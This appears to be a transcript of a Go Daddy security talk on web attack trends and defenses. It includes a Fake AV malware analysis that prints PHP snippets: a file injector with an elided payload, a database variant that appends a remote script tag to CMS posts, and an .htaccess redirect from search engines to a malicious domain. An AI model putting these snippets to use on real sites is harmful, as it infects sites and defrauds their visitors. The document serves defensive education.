Transcript Ganesh Devarajan & Todd Redfoot KEEPING UP WITH THE WEB APPLICATION SECURITY.

Ganesh Devarajan & Todd Redfoot
KEEPING UP WITH THE WEB
APPLICATION SECURITY
Introduction
 Todd Redfoot
 Chief Information Security Officer
 Ganesh Devarajan
 Sr. Security Architect
The Background
(What does Go Daddy do?)
What does Go Daddy do?
 9.4 Million Customers
 48 Million Domains Under Management
 Over 5 million Active Hosting Accounts
 1/3 of all DNS queries run through our servers
 We register, renew or transfer more than
one domain name every second
What does Go Daddy do?
 40+ Security Professionals in Team
 24 x 7 Operations Center
 Research
 Engineering
 Forensics
 Customer Security Advisors
 Penetration Testing
 User Administration
 Development
The Numbers
(What does Go Daddy see?)
What do we see?
 Monitor over 100,000 events per second
 8.6 Billion/Day
 DDoS - ~900 Attacks per day / 6K per week
 Feb 2011 - Largest attack @ 21M pps
 Last Week – 40G Attack
 Brute Force – 3.5M per hour
What do we see?
 “Other” Attacks :
 425K – Invalid Directory Traversal
 90K – XSS Prevention
 115K – SQL Injection Prevention
… all in a 24 hour period…
Current Trends
SSH Brute Forcers
JP CA BR
FR
TW
2% 2%
AR 3% 2% 2%
BG 4%
5%
KR
6%
US
54%
CN
20%
SSH Brute Forcers
Englewood, Colorado
140 Million attempts
MS-SQL Brute Forcers
US
65%
CN
24%
TR
5%
CA
KR
IE VN RU TH 1% - 2%
0% 0% 0% 1%
2%
MS-SQL Brute Forcers
Orlando, FL
348 Million attempts
My-SQL Brute Forcers
US
78%
CN
12%
CA
4%
SE
PH MY FR 2%
JP
IN
KR
1% 1% 2%
0%
0%
0%
My-SQL Brute Forcers
FTP Brute Forcers
CN
66%
US
26%
HK
2%
TW
DE RS KR
IE
1%
BR
1%
0% 0%
2% CA
0%
2%
FTP Brute Forcers
XingPing, CN
12 Million attempts
Brute Forcers - All
US
60%
CN
27%
TR
KR 4%
CA
BG - 2% 2%
TH
AR
TW
1% 1%
1%
1%
1%
Brute Forcers - US
Garden City, NY
75.7 Million attempts
Brute Forcers - CN
Datong, CN
22.5 Million attempts
Brute Forcinator
SQL Injection
CN
28%
BG
9%
US
41%
AU JP
2% 2%
FR
2%
CZ
3%
NL
4%
ID
4%
UK
5%
SQL Injection
Seattle, WA
1.3 Million attempts
Backdoor Shells
US
87%
ID
4%
NL BR DE CA CN UK
AL 1%
1% 1% 1% 1% 2%
0%
NG
2%
Backdoor Shells
Phone Company (91%)
Mountain View, CA
PHP Attacks
US
66%
KR
8%
FR
6%
NL CA BR
2% 2% 3%
UK
3%
LU
3%
RU
DE 4%
3%
PHP Attacks
Berlin, Germany
1.9 Million attempts
PHP Attacks
Montreal, CA
1.1 Million attempts
Botnet
KR
6%
UK
7%
US
51%
PL
6%
FR
6%
AU
3%
NL
4%
RU
5%
CA
6%
DE
6%
Botnet
Botnet
Source - https://zeustracker.abuse.ch/
Botnet
Source - http://www.shadowserver.org/wiki/pmwiki.php/Stats/DroneMaps
Phishing
The Good, Bad and Ugly?
The Bad – Most Events
The Ugly – Security Events & DDoS
New Trends
Recent Changes
 “Hacktivists”
 Lulzsec = Twitter
 ComodoHacker = Pastebin
 Phishing -> Spear Phishing
 Targeted & Coordinated Attacks
 RSA / Lockheed Martin Connection
What’s in the News?
More of the same…
 More Client-side Exploits
 Browser exploits
 Adobe exploits
 Web Server Compromises
 Brute Force Attacks
 Leveraging Web Application Vulnerabilities
 Config files with passwords
Fake AV
 Scareware
 Reports fake viruses to users
 Asks for fee to remove the threat
 Paying does nothing but give them your CC#
 $10 Million in Revenue last year
Fake AV Analysis
Fake AV – Attack Breakdown
Servers with Compromised Accounts
(Zeus/Phishing/etc)
Compromised Attack Server(s)
FTP/SSH Upload of Attack Shell/Script
Make HTTP calls to infection script and site is infected
Casual Web User Visits Infected Site
<script>http://intermediary.com/ll.php</script>
Registrant:
Hilary Kneber [email protected]
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
End Users
GET http://intermediary.com/ll.php
Disposable Domain Name
<html>Holy Crap! Infected! Click Here to clean</html>
$$$$$$
Fake AV Basterds
Fake AV – Sample Shell
$z=$_SERVER["DOCUMENT_ROOT"];
$encoded='<'.'?php /**/ [base64 encoded string]"));?'.'>';
@unlink($_SERVER['SCRIPT_FILENAME']);
$val=$z;
$totalinjected=0;
echo "Working with $val\n!!STARTING!!";
ob_flush();
$start_time=microtime(true);
if ($val!="")do_folder($val);
$end_time=microtime(true)-$start_time;
echo "|Injected| $totalinjected files in $end_time seconds\n";
Fake AV – DB Variant
…
$insert='<script src="http://welcometotheglobalisorg.com/js.php?kk=26"></script>';
...
$link=mysql_connect($host,$user,$pass);
if (!$link) {
die('Could not connect: ' . mysql_error());
}else{
echo 'Connected successfully'."\n";
$db_list = mysql_list_dbs($link);
$bases = array();
while ($row = mysql_fetch_object($db_list)) {
$bases[]=$row->Database;
}
…
//wordpress
if (last_is($table,"_posts")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')"; }
//joomla
if (last_is($table,"_content")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `introtext` = concat(`introtext`,'$insert')“; }
//drupal
if (last_is($table,"node_revisions")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `body` = concat(`body`,'$insert'), format=2“; }
if (last_is($table,"_post")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `title` = concat(`title`,'$insert')“; }
Fake AV - Search Redirect
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=945 [R,L]
</IfModule>
addhandler x-httpd-php-cgi .php4
addhandler x-httpd-php5-cgi .php5
addhandler x-httpd-php5-cgi .php
Custom Monitoring
UDP Flooder
How to Protect?
Website Vulnerability Scanners
 Website Protection -Site Scanner ($48/Year)
 Beyond Security($99.95/Year)
 McAfee SecureTM (~$2100/Year)
 WhiteHat Security®
 IBM AppScan®
 Cenzic®
 HP WebInspect®
Web Based Malware Detection
 Virtual machine Honey pots
 Monitor Creation of new Processes, File system or
Registry entries, etc.
 Browser Emulation
 Reputation Service
 Internet’s black list
 Signature Based Detection/Prevention
 Intrusion Detection System/Intrusion Prevention
System
 Anti-Virus
New Methodologies
Questions?
Thank You
 Ganesh Devarajan
 [email protected]
 Todd Redfoot
 [email protected]